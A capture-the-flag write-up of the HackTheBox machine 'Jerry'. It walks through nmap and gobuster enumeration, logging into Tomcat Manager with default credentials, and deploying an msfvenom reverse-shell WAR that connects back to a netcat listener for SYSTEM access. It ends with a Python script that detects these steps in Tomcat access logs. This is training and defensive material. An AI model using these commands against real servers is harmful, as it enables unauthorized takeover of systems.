Jerry
As usual, we start with an nmap scan in order to find open ports on the target machine.
The following nmap command scans the target machine for open ports quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
As we see, port 8080 is the only one that is open. It looks like there is an HTTP service, so let's try to obtain more information about the service and version running on that port. The following command scans port 8080 in more depth and saves the result into a file:
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
So we have an Apache Tomcat/Coyote JSP server. If we open the site in a web browser, we see the default Apache Tomcat page.
At this point, I would try to enumerate the web page directories with gobuster.
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir: enumerate directories or files.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200 threads.
If we take a look at the /manager directory, a popup login form appears.
Let's try some random credentials, such as user admin and password admin.
We get a 403 Access Denied message. If you look closely at the error page, some default credentials appear on one of its lines.
Now we have the user tomcat with the password s3cret. Let's refresh the page and enter the default credentials.
If you refresh the page and the 403 message still appears, close the browser and open it again.
And we got in! The next step is to get a reverse shell. If we check out the web page, we can see there is a Deploy section in which we can upload WAR files.
At this point, the idea is to create a WAR payload with msfvenom, upload it to the web page, and get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse_shell.war
-p: indicates the type of payload.
lhost: local host IP.
lport: local port of the listener.
-f: output format.
-o: save the output to a file.
All we have to do is upload the payload and hit Deploy.
Under the Application section, a new row should appear with the path of our uploaded payload.
Finally, all we have to do is set up a netcat listener on port 4444 and browse to the /reverse_shell path.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
We are already the nt authority\system user, so all we have to do is reap the harvest and get the flags.
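From the defender's side, both steps of this box (credential guessing against the Tomcat Manager and a WAR deployment through it) leave a clear trail in Tomcat's access log. The following Python script is an added example, not part of the original write-up: it parses log lines in Tomcat's default AccessLogValve "common" pattern and flags repeated 401/403 responses under /manager/ per source IP as well as any upload or deploy request. The log lines are constructed for the example and the IPs and timestamps are placeholders.

```python
import re
from collections import Counter

# Constructed sample in Tomcat's "common" access-log pattern: %h %l %u %t "%r" %s %b.
# The IPs, user names and timestamps are placeholders, not data from any real host.
SAMPLE_LOG = """\
10.10.14.14 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.14 - admin [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 403 3446
10.10.14.14 - tomcat [01/Jan/2024:10:00:20 +0000] "GET /manager/html HTTP/1.1" 200 16311
10.10.14.14 - tomcat [01/Jan/2024:10:00:41 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17233
10.10.14.14 - - [01/Jan/2024:10:00:50 +0000] "GET /reverse_shell/ HTTP/1.1" 200 0
192.0.2.7 - - [01/Jan/2024:10:05:00 +0000] "GET /docs/ HTTP/1.1" 200 9873
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that accept a new application: the HTML form upload and the text-interface deploy.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse(line):
    """Return the fields of one access-log line as a dict, or None if the line does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, auth_fail_threshold=2):
    """Return per-IP manager auth failures at or above the threshold and every deployment seen."""
    failures = Counter()
    deployments = []
    for raw in log_text.splitlines():
        rec = parse(raw)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string (e.g. the CSRF nonce)
        if path.startswith("/manager/") and rec["status"] in ("401", "403"):
            failures[rec["ip"]] += 1
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            deployments.append((rec["ip"], rec["user"], path))
    suspicious = {ip: n for ip, n in failures.items() if n >= auth_fail_threshold}
    return {"auth_failures": suspicious, "deployments": deployments}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

On the sample, the script reports two manager authentication failures from 10.10.14.14 followed by a WAR upload by the tomcat user, which is exactly the sequence a detection rule for this box should alert on.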